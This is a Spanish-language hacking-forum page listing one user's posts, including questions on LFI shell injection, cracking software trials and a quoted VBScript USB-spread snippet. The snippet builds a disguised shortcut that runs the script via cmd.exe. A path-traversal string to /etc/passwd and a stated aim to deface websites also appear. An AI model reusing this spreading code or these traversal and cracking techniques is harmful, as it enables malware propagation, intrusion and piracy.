elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1]
1  Programación / Ingeniería Inversa / Ayuda con IDA y .net en: 31 Marzo 2017, 11:13 am
Alguien me podria dar un alcanze de como patchear y editar manualmente en IDA porque lo estoy haciendo como lo hacia con otros programas (no .net) pero ahora no entiendo porque al cambiar manualmente algun dato no lo patchea :s
2  Seguridad Informática / Análisis y Diseño de Malware / Duda sobre USB spread en: 17 Marzo 2014, 23:59 pm
Alguien que sea tan amable de explicarme estas lineas que dejo de ejemplo MadAntrax en uno de sus post, no estoy muy familiarizado con este tipo de spread.
Código
  1. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
  2. lnkobj.windowstyle = 7
  3. lnkobj.targetpath = "cmd.exe"
  4. lnkobj.workingdirectory = ""
  5. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
  6. lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
  7. lnkobj.save()
  8.  
3  Seguridad Informática / Nivel Web / Encontrar logs en LFI en: 17 Febrero 2012, 06:58 am
Bueno esa es mi duda estoy practicando lfi y rfi pero hay mas webs para hacer lfi y defacear, hasta el momento no eh defaceado una por eso no tengo suficiente experiencia asi que mi pregunta es como encontrar la ruta de los logs para poder inyectar una shell:

Tengo esto por el momento:

Código:
/www/htdocs/www.web.com/index.php

ese es el directorio de la web supongo que el server es compartido porque al poner ../../../../../../../etc/passwd salen varios usuarios y no permite ataque rfi
4  Informática / Hardware / Presupuesto minimo para un pc que soporte lo ultimo en: 14 Febrero 2012, 19:40 pm
Bueno nose mucho sobre precios y esas cosas pero quiero armar una pc por partes que sea buena para soportar juegos como FIFA PES COD, diseño grafico y programacion  ;D

Gracias por su apoyo ^^
5  Programación / Ingeniería Inversa / Una ayudadita con trial en: 15 Febrero 2011, 19:44 pm
Bueno tengo un programa que la versión trial ya ha caducado (7 dias) y ahora solo queda registrar bueno mi pregunta va como encontra la parte en olly donde se haec ese salto para saltarse los 7 dias o sino que cualquier serial sea valido :s

Bueno eso es todo.

Saludos!
6  Programación / Ingeniería Inversa / Una Ayuda de los pro en: 12 Enero 2011, 16:11 pm
Bueno me eh encontrado con un programita hecho en .net y necesito algo de ayuda para saltarme la primera parte del programa que pide logearse con una cuenta de paga :( eh leido el de "43H4FH44H45H4CH49" pero no entiendo mucho ... si me pudieran explicar desde el comienzo (no digo que ustedes lo hagan si no quiro hacerlo yo para aprender) poco a poco para ir manejandome mas gracias.
7  Seguridad Informática / Nivel Web / Alguien sabe como esta cifrado este codigo en: 1 Enero 2011, 23:16 pm
Bueno este pedacito de codigo necesito descifrar para encontrar un bug en una web nose si me puedan ayudar a desencriptarlo y explicarme como hacerlo:

Código:
ck1.php?k=1BC5AA0E7E4567A2F8EAB27210770999&cdk=true

esta aparte para ser mas preciso:

Código:
1BC5AA0E7E4567A2F8EAB27210770999
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines